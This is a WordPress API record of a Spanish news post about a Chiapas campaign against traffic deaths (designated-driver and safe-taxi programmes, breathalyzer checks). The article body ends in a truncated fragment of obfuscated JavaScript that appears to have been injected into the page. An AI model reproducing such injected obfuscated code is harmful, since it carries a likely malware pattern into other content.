{"id":20316,"date":"2025-02-12T03:38:56","date_gmt":"2025-02-12T03:38:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20316"},"modified":"2025-02-12T03:38:57","modified_gmt":"2025-02-12T03:38:57","slug":"implementan-estrategias-para-reducir-mortalidad-por-accidentes-de-transito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20316","title":{"rendered":"Implementan estrategias para reducir mortalidad por accidentes de tr\u00e1nsito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250211-WA0011-1024x768.jpg\" alt=\"\" class=\"wp-image-20317\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250211-WA0011-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250211-WA0011-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250211-WA0011-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250211-WA0011.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>11 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Los accidentes de tr\u00e1nsito son la principal causa de muerte en la poblaci\u00f3n joven del pa\u00eds y en Chiapas no es la excepci\u00f3n, por ello de manera interinstitucional fue presentado en Tuxtla la Campa\u00f1a Para Reducir el Impacto de Las Lesiones Causadas por el Tr\u00e1nsito en la capital chiapaneca.<\/p>\n\n\n\n<p>La Secretar\u00eda de Salud, la Secretar\u00eda de Movilidad y Transporte y la Fiscal\u00eda General del Estado suman esfuerzos para impulsar estilos de vida m\u00e1s saludables en la poblaci\u00f3n.<\/p>\n\n\n\n<p>Omar G\u00f3mez Cruz, secretario de salud en la entidad dio a conocer que, estos mecanismos son el programa \u201cTaxi Seguro\u201d y \u201cConductor Designado\u201d.<\/p>\n\n\n\n<p>Indic\u00f3 que estas medidas son impulsadas para la prevenci\u00f3n de accidentes por consumo de alcohol y contemplan el operativo alcohol\u00edmetro, as\u00ed como la reducci\u00f3n de los horarios de venta de licor en antros y bares.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que los accidentes de tr\u00e1nsito son un problema de salud p\u00fablica, afectan la esperanza de vida y en Chiapas se encuentran dentro de las primeras causas de muerte.<\/p>\n\n\n\n<p>Cuatro de cada diez ingresos a las salas de urgencia son causadas por accidentes de tr\u00e1nsito.<br>\u201cEl objetivo es reducci\u00f3n de los accidentes de tr\u00e1nsito, garantizar un retorno seguro, formar la participaci\u00f3n ciudadana de ser un conductor responsable, por eso estamos aqu\u00ed varias secretarias\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Destac\u00f3 la importancia de los datos que se tienen de la siniestralidad por los accidentes de tr\u00e1nsito ya que est\u00e1n dentro de las principales causas de muerte en el mundo y en la poblaci\u00f3n joven es la principal.<\/p>\n\n\n\n<p>A nivel local cit\u00f3 que cuatro de cada 10 ingresos al Hospital G\u00f3mez Maza son por accidentes de tr\u00e1nsito.<\/p>\n\n\n\n<p>A estas acciones preventivas se suman los empresarios restauranteros, de antros y bares para tener un mayor impacto en la poblaci\u00f3n.<\/p>\n\n\n\n<p>Por sus parte la Secretaria de Movilidad y Transporte del estado Albania Gonz\u00e1lez P\u00f3lito reconoci\u00f3 la disposici\u00f3n de los transportista para sumarse a estos trabajos preventivos.<\/p>\n\n\n\n<p>Hasta el momento se han sumado seis sitios de taxis a estos trabajos, y se espera que m\u00e1s sectores hagan lo propio en beneficio de la poblaci\u00f3n chiapaneca.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 11 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Los accidentes de tr\u00e1nsito son la principal causa de muerte en la poblaci\u00f3n joven del pa\u00eds y en Chiapas no es la excepci\u00f3n, por ello de manera interinstitucional fue presentado en Tuxtla la Campa\u00f1a Para Reducir el Impacto de Las Lesiones Causadas por el Tr\u00e1nsito &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20317,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20316","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20316"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20316\/revisions"}],"predecessor-version":[{"id":20318,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20316\/revisions\/20318"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20317"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}